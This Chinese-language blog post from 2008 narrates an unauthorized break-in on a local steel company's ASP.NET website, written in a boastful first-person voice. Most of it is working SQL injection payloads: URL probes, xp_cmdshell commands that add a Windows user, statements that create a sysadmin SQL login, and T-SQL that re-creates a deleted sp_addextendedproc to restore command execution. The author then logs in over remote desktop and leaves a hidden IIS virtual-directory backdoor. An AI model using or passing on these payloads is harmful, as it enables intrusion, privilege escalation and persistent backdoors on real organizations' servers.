責任編輯:酷酷の魚 更新日期:2008-2-17
今天沒事做,對本地的一家鋼鐵企業的網站做了次安檢,嘿嘿.漏洞一大把.當然 這是意料中的事.最近搞大家都喜歡搞腳本.那我也就從他們的網站程序看看了.
show.aspx?id=1』
嘿嘿 asp.net 照樣暴 說什麼有未閉合的分號.
show.aspx?id=1 and (select @@version)>0;--
果然,2003的系統
show.aspx?id=1 and 』sa'=(select System_user)--
嘿嘿 正確返回 有權限了 想到直接用xp_cmeshell直接添加帳號
因為之前已經知道這服務器開了3389的
所以 我們繼續來:
show.aspx?id=1;exec master.dbo.xp_cmdshell "net user haco lovehaco /add"--
我倒,返回結果錯誤了 看來管理員還不是很可愛噢
那我們來恢復這個存儲過程?OK 繼續
show.aspx?id=1;exec master.dbo.sp_addextendedpro xp_cmdshell,@dllname=』xplog70.dll'--
回車後……狂暈死.居然說什麼過程sp_addextendedproc沒找著 開始我以為是刪除了xplog70.dll 可是後來不這樣這樣認為了 記得以前也碰到過這樣的事 可是都沒能解決 這次一定要搞定 嘿嘿!之後 到處問人
這裡要感謝一下BST論壇裡的tob88 謝謝 是他提醒了我
不就是過程SP_ADDextendedproc被刪除了嘛 我們恢復它就是了嘛!
為了方便 我添加了個sysadmin的帳號
show.aspx?id=1;exec master.dbo.sp_addlogin haco,lovehaco;--
show.aspx?id=1;exec master.dbo.sp_addsrvrolemember haco,sysadmin;-- HOHO~ 搞定 俺自己裝了MSSQL 企業管理器裡連上這台服務器的SQL
調出查詢器 恢復過程sp_addextendedproc 如下:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,』sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
哈哈 試下 sp_addextendedproc xp_cmdshell,@dllname=』xplog70.dll'
哇!命令成功完成 耶!添加帳號 登陸3389 留個我最喜歡的絕對後門
IIS隱藏虛擬目錄 搞定 閃人……
PS:其實像sp_addextendedproc這些過程也都可以刪除掉 就不能添加了
當然 也可以恢復的 這個恢復的語句 是從MSSQL數據庫裡得到的 有興趣的朋友可以自己試試看 呵呵 這是我小泥巴第一次寫東西 很稀爛的 大家看看就算了 別笑噢 要不 我會5555哭的噢!
本文網址:http://www.3800hk.com/news/w44/136920.html
留言列表
